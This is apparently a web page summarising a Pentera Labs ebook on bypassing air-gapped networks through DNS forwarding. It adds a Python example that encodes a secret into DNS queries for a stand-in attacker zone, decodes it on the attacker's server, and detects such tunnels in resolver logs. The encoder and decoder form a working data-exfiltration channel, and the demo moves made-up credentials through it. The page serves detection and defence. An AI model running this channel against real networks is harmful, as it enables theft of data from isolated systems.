Ebook
Bypassing “air-gapped” networks via DNS
Pentera Labs demonstrated how attackers can bypass air-gapped networks by exploiting DNS misconfigurations. Although air-gapped environments are meant to be isolated, many still let their internal DNS servers forward queries to public resolvers, which creates a hidden pathway: a host with no route to the Internet can still get a query for an attacker-controlled domain delivered to the attacker's authoritative name server, and the answer delivered back. Using DNS tunneling, attackers exfiltrate data or receive commands by encoding messages into DNS queries and responses; because a single label is limited to 63 bytes and a full name to 253, the data is base64- (or base32-) encoded, sliced into chunks spread across many queries, and obfuscated to resemble ordinary lookups. Advanced methods such as Domain Generation Algorithms rotate the domains the traffic uses and make detection harder. Mitigations include running internal DNS servers that do not forward to the Internet, filtering suspicious requests, and monitoring for anomalies such as unusual query volume, many unique subdomains under one domain, or oversized names and packets.
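To make the mechanics concrete, here is an added example (not code from the Pentera ebook) that shows both sides of the technique the summary describes: an encoder that slices a secret into DNS query names under the 63-byte label and 253-byte name limits, the matching decoder an attacker's authoritative server would run, and a detector that scores a resolver log for the anomalies listed above (oversized names, many labels, high entropy, and an unusual number of distinct subdomains per client and domain). The zone `x.example.net`, the `src=... qname=... qtype=...` log format, the sample log lines and every threshold are assumptions made for this illustration. Base32 is used in place of base64 because DNS names are case-insensitive and `+`, `/` and `=` are not valid hostname characters.

```python
import base64
import math
import re
from collections import Counter, defaultdict

TUNNEL_ZONE = "x.example.net"  # hypothetical attacker-controlled zone
MAX_LABEL = 63                  # RFC 1035: one label is at most 63 octets
MAX_NAME = 253                  # RFC 1035: a full name is at most 253 text characters
LOG_RE = re.compile(r"src=(?P<src>\S+)\s+qname=(?P<qname>\S+)")  # assumed log format


# --- attacker side: turn bytes into query names the internal forwarder will carry out ---

def encode_chunks(data: bytes, zone: str = TUNNEL_ZONE, payload_labels: int = 3) -> list[str]:
    """Slice data into names of the form <seq>.<label>[.<label>...].<zone>.

    The leading sequence label lets the receiver reorder queries that arrive
    out of order, are retried, or are answered from a cache.
    """
    enc = base64.b32encode(data).decode().rstrip("=").lower()
    per_query = MAX_LABEL * payload_labels
    names = []
    for seq, off in enumerate(range(0, len(enc), per_query)):
        piece = enc[off:off + per_query]
        labels = [piece[i:i + MAX_LABEL] for i in range(0, len(piece), MAX_LABEL)]
        name = ".".join([str(seq), *labels, zone])
        if len(name) > MAX_NAME:
            raise ValueError("payload_labels too large for this zone")
        names.append(name)
    return names


def decode_chunks(names: list[str], zone: str = TUNNEL_ZONE) -> bytes:
    """Reassemble the bytes from the names seen at the attacker's authoritative server."""
    suffix = "." + zone
    pieces = {}
    for name in names:
        if not name.endswith(suffix):
            continue
        seq, *labels = name[:-len(suffix)].split(".")
        pieces[int(seq)] = "".join(labels)
    enc = "".join(pieces[k] for k in sorted(pieces)).upper()
    enc += "=" * (-len(enc) % 8)  # restore the base32 padding stripped on the way out
    return base64.b32decode(enc)


# --- defender side: score resolver logs for the artefacts tunneling leaves behind ---

def shannon_entropy(s: str) -> float:
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0


def registrable_domain(qname: str) -> str:
    # Simplification: last two labels. Real code should consult the Public Suffix List.
    return ".".join(qname.rstrip(".").lower().split(".")[-2:])


def score_query(qname: str) -> list[str]:
    """Per-query heuristics; returns the reasons a name looks like a tunnel (empty if none)."""
    labels = qname.rstrip(".").lower().split(".")[:-2]  # left of the registrable domain
    sub = ".".join(labels)
    reasons = []
    if len(sub) > 100:
        reasons.append("long-subdomain")   # oversized name: payload, not a hostname
    if len(labels) > 4:
        reasons.append("many-labels")
    if shannon_entropy(sub.replace(".", "")) > 3.8:
        reasons.append("high-entropy")     # encoded data, not words (threshold is a guess)
    return reasons


def detect(log_lines, unique_threshold: int = 5):
    """Returns (flagged name -> reasons, {(src, domain): distinct names} at or over threshold).

    Volume is counted as distinct names per (client, domain): a tunnel must keep
    names unique to defeat caching, so this climbs far faster than for normal
    lookups. A production detector would window the count by time and tune the
    threshold to the environment.
    """
    flagged, seen = {}, defaultdict(set)
    for line in log_lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        src, qname = m["src"], m["qname"].rstrip(".").lower()
        reasons = score_query(qname)
        if reasons:
            flagged[qname] = reasons
        seen[(src, registrable_domain(qname))].add(qname)
    volume = {k: len(v) for k, v in seen.items() if len(v) >= unique_threshold}
    return flagged, volume


def build_demo_log() -> list[str]:
    """Constructed resolver log: a few benign lookups plus one host tunneling a secret."""
    secret = b"user=alice;pass=hunter2;" * 25  # 600 bytes of constructed 'loot'
    benign = [
        "src=10.0.0.5 qname=www.example.com qtype=A",
        "src=10.0.0.5 qname=mail.example.com qtype=MX",
        "src=10.0.0.7 qname=cdn-a1.static.example.org qtype=A",
    ]
    tunnel = [f"src=10.0.0.9 qname={n} qtype=TXT" for n in encode_chunks(secret)]
    return benign + tunnel


if __name__ == "__main__":
    flagged, volume = detect(build_demo_log())
    for name, reasons in flagged.items():
        print(f"{', '.join(reasons):32s} {name[:60]}...")
    for (src, domain), n in volume.items():
        print(f"{src} made {n} distinct queries under {domain}")
```

Running the script shows the benign names pass every heuristic while the tunnel queries trip the length and label-count checks, and the tunneling host stands out on distinct-name volume even for the short final chunk that no per-query heuristic catches. The same structure applies to an "offline" resolver check: if the internal server forwards to the Internet, every one of these names reaches the attacker's authoritative server regardless of what the clients themselves can reach.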